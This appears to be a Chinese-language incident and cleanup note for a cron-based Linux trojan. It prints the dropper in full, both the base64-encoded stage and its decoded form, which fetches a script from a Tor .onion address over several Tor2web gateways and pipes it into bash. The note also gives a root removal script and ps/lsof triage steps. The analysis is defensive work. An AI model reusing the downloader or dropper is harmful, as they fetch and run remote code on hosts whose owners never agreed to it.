木马解决
木马文件
#!/bin/bash
# --- Analyst annotation: stage 1, as recovered from the host ---
# Dropper wrapper. It sends all of its own output to /dev/null, waits 167 s,
# then decodes an embedded base64 blob and pipes the result straight into
# bash. The decoded blob is the stage-2 script reproduced after this listing
# (the blob appears line-wrapped in this copy).
# Detection hint: a root cron command of the form
# "sleep N; echo <base64>|base64 -d|bash" with stdout/stderr discarded is a
# usable signature; presumably it is launched from the cron entries the
# cleanup script below removes -- confirm against /var/spool/cron/root and
# /etc/cron.d on the affected host.
exec &>/dev/null
sleep 167
echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KdD00Y2M0Zng3N2I3dmh4djVhCnUoKSB7Cng9L2Nybgp3Z2V0IC10MSAtVDE4MCAtcVUtIC1PL
SAtLW5vLWNoZWNrLWNlcnRpZmljYXRlICQxJHggfHwgY3VybCAtbTE4MCAtZnNTTGtBLSAkMSR4Cn0KaWYgISBscyAvcHJvYy8kKGNhdCAvdG1wLy5YMTEtdW5peC8wKS9pbzsgdGhlbgooCnUgJHQudG9yMndlYi5pbyB8fAp1ICR0Lm9uaW9uLmdsYXNzIHx8CnUgJHQub25
pb24ubW4gfHwKdSAkdC50b3Iyd2ViLnRvIHx8CnUgJHQub25pb24ud3MgfHwKdSAkdC5vbmlvbi5pbi5uZXQgfHwKdSAkdC5vbmlvbi50bwopfGJhc2gKZmkK|base64 -d|bash
# The blob above decodes to the stage-2 script that follows.
# --- Analyst annotation: stage 2, the decoded form of the base64 blob above ---
# Discard all output again, then make sure the usual binary directories are on
# PATH so wget/curl resolve even from a minimal cron environment.
exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
# Hostname part used with the Tor2web gateways below; it looks like a 16-char
# v2 .onion address reached over plain HTTPS via a gateway (inference from the
# "$t.<gateway>" pattern below).
t=4cc4fx77b7vhxv5a
# u GATEWAY_HOST: fetch https?://GATEWAY_HOST/crn and print the body to stdout.
# wget is tried first (1 attempt, 180 s timeout), curl is the fallback
# (180 s max time, follow redirects). Both disable certificate verification
# (--no-check-certificate / -k) and set the User-Agent to "-", which is a
# usable network detection signature.
u() {
x=/crn
wget -t1 -T180 -qU- -O- --no-check-certificate $1$x || curl -m180 -fsSLkA- $1$x
}
# Liveness check: the content of /tmp/.X11-unix/0 is read as a PID and
# /proc/<pid>/io is probed. If that entry is missing the implant is treated as
# not running and stage 3 is downloaded again. (The lsof output later on this
# page shows the implant itself keeping /tmp/.X11-unix/0 open for writing.)
# Cleanup implication: deleting the marker or killing the PID alone only
# triggers a re-download the next time stage 1 runs; the persistence that
# launches stage 1 has to be removed as well.
if ! ls /proc/$(cat /tmp/.X11-unix/0)/io; then
(
# Gateways are tried in order; the first one that answers wins, and its
# response body is executed by the bash at the end of the pipeline.
u $t.tor2web.io ||
u $t.onion.glass ||
u $t.onion.mn ||
u $t.tor2web.to ||
u $t.onion.ws ||
u $t.onion.in.net ||
u $t.onion.to
)|bash
fi
清除木马的命令
[root@ci ~]# cat qingchu.sh
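#!/bin/bash
# qingchu.sh - remove the cron-dropper trojan documented above.
#
# What it removes (all paths taken from the incident notes on this page):
#   - persistence: the "systemd-init" line in root's crontab and
#     /etc/cron.d/0systemd
#   - the running stage, whose PID the implant stores in a regular file under
#     /tmp/.X11-unix/
#   - the dropped files /usr/lib/systemd/systemd-init,
#     /lib/systemd/systemd-init and /root/.systemd-init
#
# Run as root. Persistence is removed BEFORE the process is killed so that a
# cron run cannot relaunch the dropper in between. Processes found by
# "ps -lef" (random names, parent PID 1) still have to be reviewed and killed
# by hand, as the notes below describe.
set -u

readonly marker_dir=/tmp/.X11-unix
readonly cron_file=/var/spool/cron/root
readonly cron_d_file=/etc/cron.d/0systemd
readonly dropped_files=(
  /usr/lib/systemd/systemd-init
  /lib/systemd/systemd-init
  /root/.systemd-init
)

# 1. Persistence first. Guard on the crontab existing so sed does not fail
#    (and create nothing) on a host without a root crontab.
if [[ -f "$cron_file" ]]; then
  sed -i '/systemd-init/d' "$cron_file"
fi
rm -f -- "$cron_d_file"

# 2. Kill the process recorded in the marker file(s). Only regular files
#    holding a bare PID are honoured: the legitimate X11 sockets that also live
#    in /tmp/.X11-unix are neither read nor deleted, and a marker with
#    non-numeric content (or pointing at PID 0/1) cannot turn into a "kill -9"
#    of something unintended. SIGKILL is used deliberately, since a trojan may
#    ignore or trap SIGTERM.
for marker in "$marker_dir"/*; do
  [[ -f "$marker" ]] || continue
  pid=$(tr -d '[:space:]' < "$marker")
  if [[ "$pid" =~ ^[0-9]+$ ]] && (( pid > 1 )) && [[ -d "/proc/$pid" ]]; then
    kill -9 "$pid" || printf 'warn: could not kill pid %s\n' "$pid" >&2
  fi
  rm -f -- "$marker"
done

# 3. Dropped files last; they are inert once nothing launches them.
for f in "${dropped_files[@]}"; do
  rm -f -- "$f"
done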
杀掉木马进程
使用
ps -lef
找出可疑的进程（父进程 PID 为 1、进程名为随机字母数字、或 CPU 占用异常高的进程都值得怀疑）
例如
1 S root 964 1 0 80 0 - 557 hrtime Oct03 ? 00:00:04 wdQbhA
1 S root 67000 1 0 80 0 - 557 hrtime Oct03 ? 00:00:03 0fvpPD
1 S root 1963 1 0 80 0 - 557 hrtime Aug28 ? 00:00:05 fvInxF
1 S root 127292 1 99 80 0 - 20051 futex_ 18:16 ? 2-15:45:17 1GUo01
查看这些进程是怎样启动的、通过什么启动的（用 lsof 查看进程打开的文件）
[root@ci ~]# lsof -p 1963
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
fvInxF 1963 root cwd DIR 8,2 4096 67108929 /root
fvInxF 1963 root rtd DIR 8,2 4096 64 /
fvInxF 1963 root txt REG 8,2 20972 68875717 /root/597ea2f6238a0d2d5f451b89eaf270e3 (deleted)
fvInxF 1963 root 0w REG 8,2 5 202855197 /tmp/.X11-unix/0 (deleted)
[root@ci ~]# bash -x qingchu.sh
杀掉这些进程